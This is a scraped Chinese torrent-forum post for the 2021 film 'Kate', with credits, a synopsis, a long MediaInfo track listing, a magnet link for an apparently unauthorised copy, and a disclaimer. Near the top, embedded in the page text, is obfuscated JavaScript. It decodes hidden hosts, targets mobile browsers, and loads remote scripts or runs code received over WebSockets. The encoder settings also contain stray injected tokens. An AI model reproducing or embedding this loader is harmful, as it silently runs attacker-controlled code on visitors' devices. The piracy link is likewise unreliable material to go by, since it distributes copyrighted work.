凯特[中文字幕].Kate.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264 9.69GB

版主小s 11天前 227

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 凯特 / 绝命凯特

◎片 名 Kate

◎年 代 2021

◎产 地 美国

◎类 别 动作 / 惊悚 / 犯罪 / 冒险

◎语 言 英语

◎上映日期 2021-09-10(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt7737528/

◎豆瓣链接 https://movie.douban.com/subject/27177908/

◎片 长 106分钟

◎导 演 塞德里克·萨科 Cedric Nicolas-Troyan (id:1036186)

◎编 剧 乌迈尔·阿莱姆 Umair Aleem (id:1404890)

◎演 员 玛丽·伊丽莎白·温斯特德 Mary Elizabeth Winstead (id:1041018)

米希尔·赫伊斯曼 Michiel Huisman (id:1009362)

伍迪·哈里森 Woody Harrelson (id:1053560)

浅野忠信 Tadanobu Asano (id:1036630)

艾尔西亚·罗塔鲁 Elysia Rotaru (id:1265349)

石原贵雅 Miyavi (id:1314385)

阿梅利亚·克劳奇 Amelia Crouch (id:1358553)

国村隼 Jun Kunimura (id:1041791)

玛丽·亚马莫托 Mari Yamamoto (id:1376972)

艾娃·卡约菲丽斯 Ava Caryofyllis (id:1424758)

约恩·奥布赖恩 Eoin O'Brien (id:1424812)

西琳娅·温西里 Cindy Burbridge (id:1307486)

大卫·雷奇 David Leitch (id:1289765)

◎标 签 动作 / Netflix / 美国 / 玛丽·伊丽莎白·温斯特德 / 2021 / 惊悚 / 美国电影 / 伍迪·哈里森

◎简 介

Netflix将打造一部以女性为主角的硬动作片《凯特》(Kate),具有《杀死比尔》和《女囚尼基塔》的风格,“把凯特·布兰切特想象为李·马文带进一部硬汉动作惊悚片,女主角要在24小时之内解决自己的谋杀案”。不过大魔王并没有确定出演,片方将寻找合适导演和主演,明年4月开拍,成本约为2500万美元。剧本由Umair Aleem(《终极救援》)编写,制片人包括 Kelly McCormick(《极寒之城》)、大卫·雷奇(《疾速追杀》《极寒之城》《死侍2》)、 Bryan Unkeless(《饥饿游戏》《我,托尼亚》)。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 151545935407721349216506029421229643493 (0x7202AF7C9CE082EF60CB74CA9FCA16E5)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.69 GiB

  8. Duration : 1 h 47 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 12.9 Mb/s

  11. Encoded date : UTC 2021-09-10 09:41:48

  12. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  13. Writing library : libebml v1.3.10 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 47 min

  24. Bit rate mode : Variable

  25. Bit rate : 1 849 kb/s

  26. Nominal bit rate : 2 415 kb/s

  27. Maximum bit rate : 4 110 kb/s

  28. Width : 1 920 pixels

  29. Height : 1 080 pixels

  30. Display aspect ratio : 16:9

  31. Frame rate mode : Constant

  32. Frame rate : 24.000 FPS

  33. Color space : YUV

  34. Chroma subsampling : 4:2:0

  35. Bit depth : 8 bits

  36. Scan type : Progressive

  37. Bits/(Pixel*Frame) : 0.037

  38. Stream size : 1.39 GiB (14%)

  39. Writing library : x264 core 148 r2722 1b0121b

  40. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=2415 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=4110 / vbv_bufsize=5480 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  41. Default : Yes

  42. Forced : No


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3 JOC

  46. Format/Info : Enhanced AC-3 with Joint Object Coding

  47. Commercial name : Dolby Digital Plus with Dolby Atmos

  48. Codec ID : A_EAC3

  49. Duration : 1 h 47 min

  50. Bit rate mode : Constant

  51. Bit rate : 768 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 592 MiB (6%)

  58. Title : English

  59. Language : English

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No

  63. Complexity index : 16

  64. Number of dynamic objects : 15

  65. Bed channel count : 1 channel

  66. Bed channel configuration : LFE


  67. Audio #2

  68. ID : 3

  69. Format : E-AC-3

  70. Format/Info : Enhanced AC-3

  71. Commercial name : Dolby Digital Plus

  72. Codec ID : A_EAC3

  73. Duration : 1 h 47 min

  74. Bit rate mode : Constant

  75. Bit rate : 640 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : L R C LFE Ls Rs

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 31.250 FPS (1536 SPF)

  80. Compression mode : Lossy

  81. Stream size : 494 MiB (5%)

  82. Title : Czech

  83. Language : Czech

  84. Service kind : Complete Main

  85. Default : No

  86. Forced : No


  87. Audio #3

  88. ID : 4

  89. Format : E-AC-3

  90. Format/Info : Enhanced AC-3

  91. Commercial name : Dolby Digital Plus

  92. Codec ID : A_EAC3

  93. Duration : 1 h 47 min

  94. Bit rate mode : Constant

  95. Bit rate : 640 kb/s

  96. Channel(s) : 6 channels

  97. Channel layout : L R C LFE Ls Rs

  98. Sampling rate : 48.0 kHz

  99. Frame rate : 31.250 FPS (1536 SPF)

  100. Compression mode : Lossy

  101. Stream size : 494 MiB (5%)

  102. Title : French

  103. Language : French

  104. Service kind : Complete Main

  105. Default : No

  106. Forced : No


  107. Audio #4

  108. ID : 5

  109. Format : E-AC-3

  110. Format/Info : Enhanced AC-3

  111. Commercial name : Dolby Digital Plus

  112. Codec ID : A_EAC3

  113. Duration : 1 h 47 min

  114. Bit rate mode : Constant

  115. Bit rate : 640 kb/s

  116. Channel(s) : 6 channels

  117. Channel layout : L R C LFE Ls Rs

  118. Sampling rate : 48.0 kHz

  119. Frame rate : 31.250 FPS (1536 SPF)

  120. Compression mode : Lossy

  121. Stream size : 494 MiB (5%)

  122. Title : German

  123. Language : German

  124. Service kind : Complete Main

  125. Default : No

  126. Forced : No


  127. Audio #5

  128. ID : 6

  129. Format : E-AC-3

  130. Format/Info : Enhanced AC-3

  131. Commercial name : Dolby Digital Plus

  132. Codec ID : A_EAC3

  133. Duration : 1 h 47 min

  134. Bit rate mode : Constant

  135. Bit rate : 640 kb/s

  136. Channel(s) : 6 channels

  137. Channel layout : L R C LFE Ls Rs

  138. Sampling rate : 48.0 kHz

  139. Frame rate : 31.250 FPS (1536 SPF)

  140. Compression mode : Lossy

  141. Stream size : 494 MiB (5%)

  142. Title : Hindi

  143. Language : Hindi

  144. Service kind : Complete Main

  145. Default : No

  146. Forced : No


  147. Audio #6

  148. ID : 7

  149. Format : E-AC-3

  150. Format/Info : Enhanced AC-3

  151. Commercial name : Dolby Digital Plus

  152. Codec ID : A_EAC3

  153. Duration : 1 h 47 min

  154. Bit rate mode : Constant

  155. Bit rate : 640 kb/s

  156. Channel(s) : 6 channels

  157. Channel layout : L R C LFE Ls Rs

  158. Sampling rate : 48.0 kHz

  159. Frame rate : 31.250 FPS (1536 SPF)

  160. Compression mode : Lossy

  161. Stream size : 494 MiB (5%)

  162. Title : Hungarian

  163. Language : Hungarian

  164. Service kind : Complete Main

  165. Default : No

  166. Forced : No


  167. Audio #7

  168. ID : 8

  169. Format : E-AC-3

  170. Format/Info : Enhanced AC-3

  171. Commercial name : Dolby Digital Plus

  172. Codec ID : A_EAC3

  173. Duration : 1 h 47 min

  174. Bit rate mode : Constant

  175. Bit rate : 640 kb/s

  176. Channel(s) : 6 channels

  177. Channel layout : L R C LFE Ls Rs

  178. Sampling rate : 48.0 kHz

  179. Frame rate : 31.250 FPS (1536 SPF)

  180. Compression mode : Lossy

  181. Stream size : 494 MiB (5%)

  182. Title : Indonesian

  183. Language : Indonesian

  184. Service kind : Complete Main

  185. Default : No

  186. Forced : No


  187. Audio #8

  188. ID : 9

  189. Format : E-AC-3

  190. Format/Info : Enhanced AC-3

  191. Commercial name : Dolby Digital Plus

  192. Codec ID : A_EAC3

  193. Duration : 1 h 47 min

  194. Bit rate mode : Constant

  195. Bit rate : 640 kb/s

  196. Channel(s) : 6 channels

  197. Channel layout : L R C LFE Ls Rs

  198. Sampling rate : 48.0 kHz

  199. Frame rate : 31.250 FPS (1536 SPF)

  200. Compression mode : Lossy

  201. Stream size : 494 MiB (5%)

  202. Title : Italian

  203. Language : Italian

  204. Service kind : Complete Main

  205. Default : No

  206. Forced : No


  207. Audio #9

  208. ID : 10

  209. Format : E-AC-3

  210. Format/Info : Enhanced AC-3

  211. Commercial name : Dolby Digital Plus

  212. Codec ID : A_EAC3

  213. Duration : 1 h 47 min

  214. Bit rate mode : Constant

  215. Bit rate : 640 kb/s

  216. Channel(s) : 6 channels

  217. Channel layout : L R C LFE Ls Rs

  218. Sampling rate : 48.0 kHz

  219. Frame rate : 31.250 FPS (1536 SPF)

  220. Compression mode : Lossy

  221. Stream size : 494 MiB (5%)

  222. Title : Japanese

  223. Language : Japanese

  224. Service kind : Complete Main

  225. Default : No

  226. Forced : No


  227. Audio #10

  228. ID : 11

  229. Format : E-AC-3

  230. Format/Info : Enhanced AC-3

  231. Commercial name : Dolby Digital Plus

  232. Codec ID : A_EAC3

  233. Duration : 1 h 47 min

  234. Bit rate mode : Constant

  235. Bit rate : 640 kb/s

  236. Channel(s) : 6 channels

  237. Channel layout : L R C LFE Ls Rs

  238. Sampling rate : 48.0 kHz

  239. Frame rate : 31.250 FPS (1536 SPF)

  240. Compression mode : Lossy

  241. Stream size : 494 MiB (5%)

  242. Title : Polish

  243. Language : Polish

  244. Service kind : Complete Main

  245. Default : No

  246. Forced : No


  247. Audio #11

  248. ID : 12

  249. Format : E-AC-3

  250. Format/Info : Enhanced AC-3

  251. Commercial name : Dolby Digital Plus

  252. Codec ID : A_EAC3

  253. Duration : 1 h 47 min

  254. Bit rate mode : Constant

  255. Bit rate : 640 kb/s

  256. Channel(s) : 6 channels

  257. Channel layout : L R C LFE Ls Rs

  258. Sampling rate : 48.0 kHz

  259. Frame rate : 31.250 FPS (1536 SPF)

  260. Compression mode : Lossy

  261. Stream size : 494 MiB (5%)

  262. Title : Brazilian Portuguese

  263. Language : Portuguese

  264. Service kind : Complete Main

  265. Default : No

  266. Forced : No


  267. Audio #12

  268. ID : 13

  269. Format : E-AC-3

  270. Format/Info : Enhanced AC-3

  271. Commercial name : Dolby Digital Plus

  272. Codec ID : A_EAC3

  273. Duration : 1 h 47 min

  274. Bit rate mode : Constant

  275. Bit rate : 640 kb/s

  276. Channel(s) : 6 channels

  277. Channel layout : L R C LFE Ls Rs

  278. Sampling rate : 48.0 kHz

  279. Frame rate : 31.250 FPS (1536 SPF)

  280. Compression mode : Lossy

  281. Stream size : 494 MiB (5%)

  282. Title : Russian

  283. Language : Russian

  284. Service kind : Complete Main

  285. Default : No

  286. Forced : No


  287. Audio #13

  288. ID : 14

  289. Format : E-AC-3

  290. Format/Info : Enhanced AC-3

  291. Commercial name : Dolby Digital Plus

  292. Codec ID : A_EAC3

  293. Duration : 1 h 47 min

  294. Bit rate mode : Constant

  295. Bit rate : 640 kb/s

  296. Channel(s) : 6 channels

  297. Channel layout : L R C LFE Ls Rs

  298. Sampling rate : 48.0 kHz

  299. Frame rate : 31.250 FPS (1536 SPF)

  300. Compression mode : Lossy

  301. Stream size : 494 MiB (5%)

  302. Title : Spanish

  303. Language : Spanish

  304. Service kind : Complete Main

  305. Default : No

  306. Forced : No


  307. Audio #14

  308. ID : 15

  309. Format : E-AC-3

  310. Format/Info : Enhanced AC-3

  311. Commercial name : Dolby Digital Plus

  312. Codec ID : A_EAC3

  313. Duration : 1 h 47 min

  314. Bit rate mode : Constant

  315. Bit rate : 640 kb/s

  316. Channel(s) : 6 channels

  317. Channel layout : L R C LFE Ls Rs

  318. Sampling rate : 48.0 kHz

  319. Frame rate : 31.250 FPS (1536 SPF)

  320. Compression mode : Lossy

  321. Stream size : 494 MiB (5%)

  322. Title : European Spanish

  323. Language : Spanish

  324. Service kind : Complete Main

  325. Default : No

  326. Forced : No


  327. Audio #15

  328. ID : 16

  329. Format : E-AC-3

  330. Format/Info : Enhanced AC-3

  331. Commercial name : Dolby Digital Plus

  332. Codec ID : A_EAC3

  333. Duration : 1 h 47 min

  334. Bit rate mode : Constant

  335. Bit rate : 640 kb/s

  336. Channel(s) : 6 channels

  337. Channel layout : L R C LFE Ls Rs

  338. Sampling rate : 48.0 kHz

  339. Frame rate : 31.250 FPS (1536 SPF)

  340. Compression mode : Lossy

  341. Stream size : 494 MiB (5%)

  342. Title : Thai

  343. Language : Thai

  344. Service kind : Complete Main

  345. Default : No

  346. Forced : No


  347. Audio #16

  348. ID : 17

  349. Format : E-AC-3

  350. Format/Info : Enhanced AC-3

  351. Commercial name : Dolby Digital Plus

  352. Codec ID : A_EAC3

  353. Duration : 1 h 47 min

  354. Bit rate mode : Constant

  355. Bit rate : 640 kb/s

  356. Channel(s) : 6 channels

  357. Channel layout : L R C LFE Ls Rs

  358. Sampling rate : 48.0 kHz

  359. Frame rate : 31.250 FPS (1536 SPF)

  360. Compression mode : Lossy

  361. Stream size : 494 MiB (5%)

  362. Title : Turkish

  363. Language : Turkish

  364. Service kind : Complete Main

  365. Default : No

  366. Forced : No


  367. Audio #17

  368. ID : 18

  369. Format : E-AC-3

  370. Format/Info : Enhanced AC-3

  371. Commercial name : Dolby Digital Plus

  372. Codec ID : A_EAC3

  373. Duration : 1 h 47 min

  374. Bit rate mode : Constant

  375. Bit rate : 640 kb/s

  376. Channel(s) : 6 channels

  377. Channel layout : L R C LFE Ls Rs

  378. Sampling rate : 48.0 kHz

  379. Frame rate : 31.250 FPS (1536 SPF)

  380. Compression mode : Lossy

  381. Stream size : 494 MiB (5%)

  382. Title : Ukrainian

  383. Language : Ukrainian

  384. Service kind : Complete Main

  385. Default : No

  386. Forced : No


  387. Text #1

  388. ID : 19

  389. Format : UTF-8

  390. Codec ID : S_TEXT/UTF8

  391. Codec ID/Info : UTF-8 Plain Text

  392. Duration : 1 h 34 min

  393. Bit rate : 56 b/s

  394. Count of elements : 1097

  395. Stream size : 39.5 KiB (0%)

  396. Title : English

  397. Language : English

  398. Default : Yes

  399. Forced : No


  400. Text #2

  401. ID : 20

  402. Format : UTF-8

  403. Codec ID : S_TEXT/UTF8

  404. Codec ID/Info : UTF-8 Plain Text

  405. Duration : 1 h 28 min

  406. Bit rate : 6 b/s

  407. Count of elements : 172

  408. Stream size : 4.42 KiB (0%)

  409. Title : English (Forced)

  410. Language : English

  411. Default : No

  412. Forced : Yes


  413. Text #3

  414. ID : 21

  415. Format : UTF-8

  416. Codec ID : S_TEXT/UTF8

  417. Codec ID/Info : UTF-8 Plain Text

  418. Duration : 1 h 45 min

  419. Bit rate : 46 b/s

  420. Count of elements : 825

  421. Stream size : 35.9 KiB (0%)

  422. Title : Arabic

  423. Language : Arabic

  424. Default : No

  425. Forced : No


  426. Text #4

  427. ID : 22

  428. Format : UTF-8

  429. Codec ID : S_TEXT/UTF8

  430. Codec ID/Info : UTF-8 Plain Text

  431. Duration : 1 h 45 min

  432. Bit rate : 27 b/s

  433. Count of elements : 832

  434. Stream size : 21.3 KiB (0%)

  435. Title : Chinese Simplified

  436. Language : Chinese

  437. Default : No

  438. Forced : No


  439. Text #5

  440. ID : 23

  441. Format : UTF-8

  442. Codec ID : S_TEXT/UTF8

  443. Codec ID/Info : UTF-8 Plain Text

  444. Duration : 1 h 45 min

  445. Bit rate : 28 b/s

  446. Count of elements : 845

  447. Stream size : 21.7 KiB (0%)

  448. Title : Chinese Traditional

  449. Language : Chinese

  450. Default : No

  451. Forced : No


  452. Text #6

  453. ID : 24

  454. Format : UTF-8

  455. Codec ID : S_TEXT/UTF8

  456. Codec ID/Info : UTF-8 Plain Text

  457. Duration : 1 h 45 min

  458. Bit rate : 24 b/s

  459. Count of elements : 806

  460. Stream size : 19.0 KiB (0%)

  461. Title : Croatian

  462. Language : Croatian

  463. Default : No

  464. Forced : No


  465. Text #7

  466. ID : 25

  467. Format : UTF-8

  468. Codec ID : S_TEXT/UTF8

  469. Codec ID/Info : UTF-8 Plain Text

  470. Duration : 1 h 45 min

  471. Bit rate : 25 b/s

  472. Count of elements : 795

  473. Stream size : 20.0 KiB (0%)

  474. Title : Czech

  475. Language : Czech

  476. Default : No

  477. Forced : No


  478. Text #8

  479. ID : 26

  480. Format : UTF-8

  481. Codec ID : S_TEXT/UTF8

  482. Codec ID/Info : UTF-8 Plain Text

  483. Duration : 1 h 45 min

  484. Bit rate : 25 b/s

  485. Count of elements : 794

  486. Stream size : 19.5 KiB (0%)

  487. Title : Danish

  488. Language : Danish

  489. Default : No

  490. Forced : No


  491. Text #9

  492. ID : 27

  493. Format : UTF-8

  494. Codec ID : S_TEXT/UTF8

  495. Codec ID/Info : UTF-8 Plain Text

  496. Duration : 1 h 45 min

  497. Bit rate : 23 b/s

  498. Count of elements : 690

  499. Stream size : 18.6 KiB (0%)

  500. Title : Dutch

  501. Language : Dutch

  502. Default : No

  503. Forced : No


  504. Text #10

  505. ID : 28

  506. Format : UTF-8

  507. Codec ID : S_TEXT/UTF8

  508. Codec ID/Info : UTF-8 Plain Text

  509. Duration : 1 h 45 min

  510. Bit rate : 26 b/s

  511. Count of elements : 808

  512. Stream size : 20.2 KiB (0%)

  513. Title : Finnish

  514. Language : Finnish

  515. Default : No

  516. Forced : No


  517. Text #11

  518. ID : 29

  519. Format : UTF-8

  520. Codec ID : S_TEXT/UTF8

  521. Codec ID/Info : UTF-8 Plain Text

  522. Duration : 1 h 45 min

  523. Bit rate : 27 b/s

  524. Count of elements : 810

  525. Stream size : 21.6 KiB (0%)

  526. Title : French

  527. Language : French

  528. Default : No

  529. Forced : No


  530. Text #12

  531. ID : 30

  532. Format : UTF-8

  533. Codec ID : S_TEXT/UTF8

  534. Codec ID/Info : UTF-8 Plain Text

  535. Duration : 1 h 45 min

  536. Bit rate : 25 b/s

  537. Count of elements : 820

  538. Stream size : 19.4 KiB (0%)

  539. Title : German

  540. Language : German

  541. Default : No

  542. Forced : No


  543. Text #13

  544. ID : 31

  545. Format : UTF-8

  546. Codec ID : S_TEXT/UTF8

  547. Codec ID/Info : UTF-8 Plain Text

  548. Duration : 1 h 45 min

  549. Bit rate : 44 b/s

  550. Count of elements : 824

  551. Stream size : 34.2 KiB (0%)

  552. Title : Greek

  553. Language : Greek

  554. Default : No

  555. Forced : No


  556. Text #14

  557. ID : 32

  558. Format : UTF-8

  559. Codec ID : S_TEXT/UTF8

  560. Codec ID/Info : UTF-8 Plain Text

  561. Duration : 1 h 45 min

  562. Bit rate : 43 b/s

  563. Count of elements : 808

  564. Stream size : 33.5 KiB (0%)

  565. Title : Hebrew

  566. Language : Hebrew

  567. Default : No

  568. Forced : No


  569. Text #15

  570. ID : 33

  571. Format : UTF-8

  572. Codec ID : S_TEXT/UTF8

  573. Codec ID/Info : UTF-8 Plain Text

  574. Duration : 1 h 45 min

  575. Bit rate : 26 b/s

  576. Count of elements : 773

  577. Stream size : 20.3 KiB (0%)

  578. Title : Hungarian

  579. Language : Hungarian

  580. Default : No

  581. Forced : No


  582. Text #16

  583. ID : 34

  584. Format : UTF-8

  585. Codec ID : S_TEXT/UTF8

  586. Codec ID/Info : UTF-8 Plain Text

  587. Duration : 1 h 45 min

  588. Bit rate : 25 b/s

  589. Count of elements : 826

  590. Stream size : 20.1 KiB (0%)

  591. Title : Indonesian

  592. Language : Indonesian

  593. Default : No

  594. Forced : No


  595. Text #17

  596. ID : 35

  597. Format : UTF-8

  598. Codec ID : S_TEXT/UTF8

  599. Codec ID/Info : UTF-8 Plain Text

  600. Duration : 1 h 45 min

  601. Bit rate : 25 b/s

  602. Count of elements : 783

  603. Stream size : 19.6 KiB (0%)

  604. Title : Italian

  605. Language : Italian

  606. Default : No

  607. Forced : No


  608. Text #18

  609. ID : 36

  610. Format : UTF-8

  611. Codec ID : S_TEXT/UTF8

  612. Codec ID/Info : UTF-8 Plain Text

  613. Duration : 1 h 45 min

  614. Bit rate : 21 b/s

  615. Count of elements : 616

  616. Stream size : 17.0 KiB (0%)

  617. Title : Japanese

  618. Language : Japanese

  619. Default : No

  620. Forced : No


  621. Text #19

  622. ID : 37

  623. Format : UTF-8

  624. Codec ID : S_TEXT/UTF8

  625. Codec ID/Info : UTF-8 Plain Text

  626. Duration : 1 h 45 min

  627. Bit rate : 29 b/s

  628. Count of elements : 833

  629. Stream size : 23.2 KiB (0%)

  630. Title : Korean

  631. Language : Korean

  632. Default : No

  633. Forced : No


  634. Text #20

  635. ID : 38

  636. Format : UTF-8

  637. Codec ID : S_TEXT/UTF8

  638. Codec ID/Info : UTF-8 Plain Text

  639. Duration : 1 h 45 min

  640. Bit rate : 26 b/s

  641. Count of elements : 822

  642. Stream size : 20.7 KiB (0%)

  643. Title : Malay

  644. Language : Malay

  645. Default : No

  646. Forced : No


  647. Text #21

  648. ID : 39

  649. Format : UTF-8

  650. Codec ID : S_TEXT/UTF8

  651. Codec ID/Info : UTF-8 Plain Text

  652. Duration : 1 h 45 min

  653. Bit rate : 26 b/s

  654. Count of elements : 810

  655. Stream size : 20.4 KiB (0%)

  656. Title : Norwegian Bokmal

  657. Language : Norwegian Bokmal

  658. Default : No

  659. Forced : No


  660. Text #22

  661. ID : 40

  662. Format : UTF-8

  663. Codec ID : S_TEXT/UTF8

  664. Codec ID/Info : UTF-8 Plain Text

  665. Duration : 1 h 45 min

  666. Bit rate : 24 b/s

  667. Count of elements : 808

  668. Stream size : 18.9 KiB (0%)

  669. Title : Polish

  670. Language : Polish

  671. Default : No

  672. Forced : No


  673. Text #23

  674. ID : 41

  675. Format : UTF-8

  676. Codec ID : S_TEXT/UTF8

  677. Codec ID/Info : UTF-8 Plain Text

  678. Duration : 1 h 45 min

  679. Bit rate : 26 b/s

  680. Count of elements : 825

  681. Stream size : 20.7 KiB (0%)

  682. Title : Portuguese

  683. Language : Portuguese

  684. Default : No

  685. Forced : No


  686. Text #24

  687. ID : 42

  688. Format : UTF-8

  689. Codec ID : S_TEXT/UTF8

  690. Codec ID/Info : UTF-8 Plain Text

  691. Duration : 1 h 45 min

  692. Bit rate : 26 b/s

  693. Count of elements : 819

  694. Stream size : 20.3 KiB (0%)

  695. Title : Brazilian Portuguese

  696. Language : Portuguese

  697. Default : No

  698. Forced : No


  699. Text #25

  700. ID : 43

  701. Format : UTF-8

  702. Codec ID : S_TEXT/UTF8

  703. Codec ID/Info : UTF-8 Plain Text

  704. Duration : 1 h 45 min

  705. Bit rate : 29 b/s

  706. Count of elements : 795

  707. Stream size : 22.7 KiB (0%)

  708. Title : Romanian

  709. Language : Romanian

  710. Default : No

  711. Forced : No


  712. Text #26

  713. ID : 44

  714. Format : UTF-8

  715. Codec ID : S_TEXT/UTF8

  716. Codec ID/Info : UTF-8 Plain Text

  717. Duration : 1 h 45 min

  718. Bit rate : 43 b/s

  719. Count of elements : 808

  720. Stream size : 33.4 KiB (0%)

  721. Title : Russian

  722. Language : Russian

  723. Default : No

  724. Forced : No


  725. Text #27

  726. ID : 45

  727. Format : UTF-8

  728. Codec ID : S_TEXT/UTF8

  729. Codec ID/Info : UTF-8 Plain Text

  730. Duration : 1 h 45 min

  731. Bit rate : 26 b/s

  732. Count of elements : 833

  733. Stream size : 20.5 KiB (0%)

  734. Title : Spanish

  735. Language : Spanish

  736. Default : No

  737. Forced : No


  738. Text #28

  739. ID : 46

  740. Format : UTF-8

  741. Codec ID : S_TEXT/UTF8

  742. Codec ID/Info : UTF-8 Plain Text

  743. Duration : 1 h 45 min

  744. Bit rate : 25 b/s

  745. Count of elements : 818

  746. Stream size : 19.7 KiB (0%)

  747. Title : European Spanish

  748. Language : Spanish

  749. Default : No

  750. Forced : No


  751. Text #29

  752. ID : 47

  753. Format : UTF-8

  754. Codec ID : S_TEXT/UTF8

  755. Codec ID/Info : UTF-8 Plain Text

  756. Duration : 1 h 45 min

  757. Bit rate : 26 b/s

  758. Count of elements : 795

  759. Stream size : 20.4 KiB (0%)

  760. Title : Swedish

  761. Language : Swedish

  762. Default : No

  763. Forced : No


  764. Text #30

  765. ID : 48

  766. Format : UTF-8

  767. Codec ID : S_TEXT/UTF8

  768. Codec ID/Info : UTF-8 Plain Text

  769. Duration : 1 h 45 min

  770. Bit rate : 68 b/s

  771. Count of elements : 834

  772. Stream size : 53.4 KiB (0%)

  773. Title : Thai

  774. Language : Thai

  775. Default : No

  776. Forced : No


  777. Text #31

  778. ID : 49

  779. Format : UTF-8

  780. Codec ID : S_TEXT/UTF8

  781. Codec ID/Info : UTF-8 Plain Text

  782. Duration : 1 h 45 min

  783. Bit rate : 26 b/s

  784. Count of elements : 745

  785. Stream size : 20.7 KiB (0%)

  786. Title : Turkish

  787. Language : Turkish

  788. Default : No

  789. Forced : No


  790. Text #32

  791. ID : 50

  792. Format : UTF-8

  793. Codec ID : S_TEXT/UTF8

  794. Codec ID/Info : UTF-8 Plain Text

  795. Duration : 1 h 45 min

  796. Bit rate : 41 b/s

  797. Count of elements : 805

  798. Stream size : 31.9 KiB (0%)

  799. Title : Ukrainian

  800. Language : Ukrainian

  801. Default : No

  802. Forced : No


  803. Text #33

  804. ID : 51

  805. Format : UTF-8

  806. Codec ID : S_TEXT/UTF8

  807. Codec ID/Info : UTF-8 Plain Text

  808. Duration : 1 h 45 min

  809. Bit rate : 37 b/s

  810. Count of elements : 786

  811. Stream size : 28.9 KiB (0%)

  812. Title : Vietnamese

  813. Language : Vietnamese

  814. Default : No

  815. Forced : No



TAGS 动作 冒险 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:1539D522BDF4E3C7152E0D07A452452D0429EEBF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回